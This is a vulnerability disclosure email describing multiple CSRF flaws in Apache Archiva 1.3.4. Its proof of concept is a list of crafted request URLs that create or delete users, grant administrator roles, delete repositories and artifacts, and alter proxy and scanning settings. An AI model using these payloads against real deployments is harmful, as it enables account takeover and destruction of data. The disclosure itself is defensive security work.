Hi,
This is regarding multiple CSRF (Cross Site Request Forgery)
Vulnerabilities in Apache Archiva 1.3.4 (and previous versions). The
following is the disclosure document
Product Description:
Apache Archiva is an extensible repository management software that
helps taking care of your own personal or enterprise-wide build artifact
repository. It is the perfect companion for build tools such as Maven,
Continuum, and ANT.
Proof of Concept:
http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.use
rname=tester123&user.fullName=test&user.email=test%40test.com&user.passw
ord=abc&user.confirmPassword=abc
http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username
=test
http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=t
est&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_a
ddNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrato
r&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSel
ectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repos
itory+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&s
ubmitRolesButton=Submit
http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&
method%3AdeleteContents=Delete+Configuration+and+Contents
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&a
rtifactId=1&version=1&repositoryId=snapshots
http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repository
Group.id=csrfgrp
http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGro
upId=test&method%3Adelete=Confirm
http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action
?target=maven2-repository.dev.java.net&source=internal
http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?t
arget=maven2-repository.dev.java.net&source=snapshots
http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path
=jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar
http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&pro
xy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.us
ername=&proxy.password=
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?pro
xyid=myproxy
http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePatter
n.action?pattern=%2F*.rum&fileTypeId=artifacts
http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePat
tern.action?pattern=%2F*.rum&fileTypeId=artifacts
http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsum
ers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentC
onsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksu
ms&enabledKnownContentConsumers=index-content&enabledKnownContentConsume
rs=metadata-updater&enabledKnownContentConsumers=repository-purge&enable
dKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=v
alidate-checksums
http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.
action?enabledUnprocessedConsumers=update-db-project
http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.acti
on?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanup
Consumers=not-present-remove-db-project&enabledCleanupConsumers=not-pres
ent-remove-indexed
Warm Regards,
Riyaz Ahemed Walikar || Senior Engineer - Professional Services
Vulnerability Assessment & Penetration Testing
Mobile: +91-98860-42242 || Extn: 5601
The information transmitted is intended only for the person or entity to which it is addressed and may contain
confidential and/or privileged material
Any review, re-transmission, dissemination or other use of or taking of any action in reliance upon,this
information by persons or entities other than the intended recipient is prohibited.
If you received this in error, please contact the sender and delete the material from your computer.
Microland takes all reasonable steps to ensure that its electronic communications are free from viruses.
However, given Internet accessibility, the Company cannot accept liability for any virus introduced by this
e-mail or any attachment and you are advised to use up-to-date virus checking software.